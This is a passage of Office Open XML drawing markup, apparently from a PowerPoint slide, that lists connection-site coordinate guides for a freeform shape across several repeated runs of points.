              <a:gd name="connsiteX56" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 434521 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3945686 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 505401 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 463335 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 448810 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY116" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY117" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY118" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY119" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 182911 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 295260 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 263062 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 266061 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6272987 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 460893 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 434521 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 3945686 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 505401 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 463335 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 448810 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY116" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY117" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY118" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 182911 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 263062 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 266061 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6272987 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 425606 w 1349253"/>
